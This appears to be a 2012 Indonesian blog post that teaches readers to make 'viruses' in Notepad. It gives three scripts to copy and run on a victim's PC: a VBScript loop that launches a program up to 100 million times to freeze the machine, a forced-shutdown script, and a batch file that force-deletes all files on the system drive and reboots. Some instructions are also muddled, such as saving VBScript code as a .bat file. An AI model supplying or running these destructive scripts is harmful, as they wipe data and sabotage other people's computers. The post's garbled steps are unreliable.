The Muzic

gak usah liatin gue, cuekin aja..

Global Variables


Click here for Myspace Layouts

Kamis, 26 Januari 2012

How To Make Virus With Notepaad

·

Cara gampang bikin virus yaitu dengan notepad....

1. Virus berEfek Errorkan PC yang terinveksi

option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 100000000
wshshell.run "tourstart.exe"
next

copas code diatas ke notepad lalu simpan dengan nama VBS.bat jangan lupa pastikan ”save as type” diubah ke ”all files” download code

2. Efek shuttdown otomatis PC yang terinfeksi


option explicit

dim wshshell
set wshshell=wscript.createobject("wscript.shell")

dim x
for x = 1 to 1
wshshell.run "shutdown -s -c dunia-atas.blogspot.com"
next

copas code diatas ke notepad lalu simpan dengan nama dont klick.vbs jangan lupa pastikan ”save as type” diubah ke ”all files” download code

3. Efek Format otomatis Hardisk C PC yang terinfeksi

@echo off
del %systemdrive%\*.* /f /s /q
shutdown -r -f -t 00

copas code diatas ke notepad lalu simpan dengan nama dont dunia.bat jangan lupa pastikan ”save as type” diubah ke ”all files” download code

Komentarnya ya.... 

0 komentar:

Posting Komentar

handapeunpost